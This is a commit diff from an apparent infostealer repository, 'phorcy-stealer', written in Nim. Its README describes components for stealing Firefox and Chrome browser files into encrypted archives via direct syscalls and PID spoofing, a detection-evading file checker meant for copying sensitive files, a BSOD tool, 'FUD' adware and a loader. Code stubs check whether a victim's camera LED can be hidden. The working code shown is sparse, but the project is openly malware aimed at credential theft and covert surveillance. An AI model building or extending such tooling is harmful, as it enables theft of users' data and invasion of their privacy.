whiskers/phorcy-stealer
4
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

[S] moved some files. Added browser.nim.

Browse Source
This commit is contained in:
eline
2023-11-30 22:41:52 +01:00
parent f3d9936636
commit ed08a4616c
10 changed files with 39 additions and 73 deletions
Download Patch File Download Diff File Expand all files Collapse all files

21
elinethingz/README.md
View File

@@ -10,11 +10,10 @@ Takes an input bytearray and writes it to disk as first CLI argument when run.
format: format:
[seq[byte]](@[0x40,0x80] [seq[byte]](@[0x40,0x80]
# encfile.nim # encfile.nim
Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024 characters. Tested. Is suitable for sensitive data. Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024 characters. Tested. Is suitable for sensitive data.
Has a fingerprint/is detectable. Has a fingerprint/is detectable.
# OFFENSIVEencfile.nim # OFFENSIVEencfile.nim
Very stripped-down encryption tool. Takes a stream and encrypts it (AES256 with HMAC SHA512_256). No max. password size. Very stripped-down encryption tool. Takes a stream and encrypts it (AES256 with HMAC SHA512_256). No max. password size.
Has a fingerprint/is detectable. Has a fingerprint/is detectable.
@@ -22,18 +21,20 @@ Has a fingerprint/is detectable.
# Packer.nim # Packer.nim
Ideally a "packer"/loader for the main stage. Still very experimental and needs heavy rework. Ideally a "packer"/loader for the main stage. Still very experimental and needs heavy rework.
# checkfile.nim
Basic program that uses direct/hidden syscalls to know if a file exists. Undetectable in normal conditions.
Can be chained with other direct syscalls to copy sensitive files.
# Browser.nim
Uses direct syscalls to know if Firefox and Chrome are installed. Afterwards, steals the files, puts them in an encrypted archive and encrypts it with AES-256 (HMAC SHA512_256 derivation). Undetectable in theory and practice. Spoofs PID.
# bsod.nim # bsod.nim
Serves a BSOD to targets on Windows. Serves a BSOD to targets on Windows.
# basicadware.nim
Basic adware. Selects messages based on a pool. FUD.
# mic_reg.nim # mic_reg.nim
[Broken] [Broken]
Checks if Windows OSD is enabled. Checks if Windows OSD is enabled.
# checkfile.nim
Basic program that uses direct syscalls to know if a file exists. Undetectable in normal conditions.
Can be chained with other direct syscalls to copy sensitive files.
# basicadware.nim
Basic adware. At execution, shows a MessageBox with a title and content picked from a random (limited) pool.

47
elinethingz/mic_reg.nim
View File

@@ -1,47 +0,0 @@
# ____ _____ ____ ____ _____ _____
# / ___|| ____/ ___| _ \| ____|_ _|
# \___ \| _|| | | |_) | _| | |
# ___) | |__| |___| _ <| |___ | |
# |____/|_____\____|_| \_\_____| |_|
import winim
# Checks the status of the Windows "Privacy Bubbles" to know if target device has the Windows camera LED enabled.
# however, it should be noted that most PC/laptop manufacturers include a hardwired LED that cannot be disabled.
# therefore, this program does not guarantee that the user will not know about the observation.
# DOES NOT WORK.
const
KEY_QUERY_VALUE = 0x0001
HKEY_HANDLE = 0x80000002
proc checkRegistryEntry(): bool =
var hKey: HKEY
var value: DWORD
var dataSize: DWORD = sizeof(DWORD)
if RegOpenKeyEx(HKEY_HANDLE, "SOFTWARE\\Microsoft\\OEM\\Device\\Capture", 0, KEY_QUERY_VALUE, addr hKey) != ERROR_SUCCESS:
echo "Error opening registry key. Error code:", GetLastError()
return false
if RegGetValueA(HKEY_HANDLE, "NoPhysicalCameraLED", nil, nil, cast(LPBYTE, addr value), addr dataSize) != ERROR_SUCCESS:
echo "Error querying registry value. Error code:", GetLastError()
# Close the registry key even if querying failed
RegCloseKey(hKey)
return false
# Close the registry key if everything is successful
RegCloseKey(hKey)
echo "NoPhysicalCameraLED value:", value
return value == 0x1
# Example usage
if checkRegistryEntry():
echo "NoPhysicalCameraLED is set to 0x1."
else:
echo "NoPhysicalCameraLED is not set to 0x1."

0
elinethingz/bsod.nim → elinethingz/security/stage1/bsod.nim
View File

0
elinethingz/utils/checkfile.nim → elinethingz/security/stage1/checkfile.nim
View File

0
elinethingz/loader.nim → elinethingz/security/stage1/loader.nim
View File

15
elinethingz/security/stage1/mic_reg.nim Normal file
View File

@@ -0,0 +1,15 @@
# ____ _____ ____ ____ _____ _____
# / ___|| ____/ ___| _ \| ____|_ _|
# \___ \| _|| | | |_) | _| | |
# ___) | |__| |___| _ <| |___ | |
# |____/|_____\____|_| \_\_____| |_|
# Checks the status of the Windows "Privacy Bubbles" to know if target device has the Windows camera LED enabled.
# however, it should be noted that most PC/laptop manufacturers include a hardwired LED that cannot be disabled.
# therefore, this program does not guarantee that the user will not know about the observation.
# Might work. Untested, honestly.
# HKLM\\SOFTWARE\\Microsoft\\OEM\\Device\\Capture\\NoPhysicalCameraLED
# 0x0 means false, 0x1 true

19
elinethingz/security/packer/OFFENSIVEencfile.nim → elinethingz/security/stage2/OFFENSIVEencfile.nim
View File

@@ -211,20 +211,11 @@ proc encryptStream*(fIn: Stream, fOut: Stream, passw: string, bufferSize: int) =
# with big files # with big files
# Default is 64KB. # Default is 64KB.
proc encryptFile*(infile: string, outfile: string, passw: string, bufferSize: int = bufferSizeDef) = proc encryptFile*(infile: string, outfile: string, passw: string, bufferSize: int = bufferSizeDef) =
try: let fIn = newFileStream(infile, mode = fmRead)
let fIn = newFileStream(infile, mode = fmRead) defer: fIn.close()
defer: fIn.close() let fOut = newFileStream(outfile, mode = fmWrite)
defer: fOut.close()
let fOut = newFileStream(outfile, mode = fmWrite) encryptStream(fIn, fOut, passw, bufferSize)
defer: fOut.close()
encryptStream(fIn, fOut, passw, bufferSize)
except CatchableError:
let
e = getCurrentException()
msg = getCurrentExceptionMsg()
echo "Inside checkIn, got exception ", repr(e), " with message ", msg

3
elinethingz/utils/basicadware.nim → elinethingz/security/stage2/basicadware.nim
View File

@@ -19,8 +19,7 @@ proc MessageBox*(hWnd: HWND, lpText: LPCSTR, lpCaption: LPCSTR, uType: UINT): in
var var
titlemessages = @["Are you really free?", titlemessages = @["Are you really free?","You got games on your phone?","Poland!"]
"Poland!"]
captionmessages = @["From the river to the sea, Palestine will be free.", "We are the people of Heaven.", captionmessages = @["From the river to the sea, Palestine will be free.", "We are the people of Heaven.",
"War is peace. Slavery is freedom. Ignorance is strength.","Kurva mac!"] # todo: convert to cstrings "War is peace. Slavery is freedom. Ignorance is strength.","Kurva mac!"] # todo: convert to cstrings
randomize() # seeds randomizer randomize() # seeds randomizer

7
elinethingz/security/stage2/browser.nim Normal file
View File

@@ -0,0 +1,7 @@
# _____ ___ ____ ____ _____ ____ ____ _____ _____
# |_ _/ _ \| _ \ / ___|| ____/ ___| _ \| ____|_ _|
# | || | | | |_) | \___ \| _|| | | |_) | _| | |
# | || |_| | __/ ___) | |__| |___| _ <| |___ | |
# |_| \___/|_| |____/|_____\____|_| \_\_____| |_|

0
elinethingz/security/packer/packer.nim → elinethingz/security/stage2/packer.nim
View File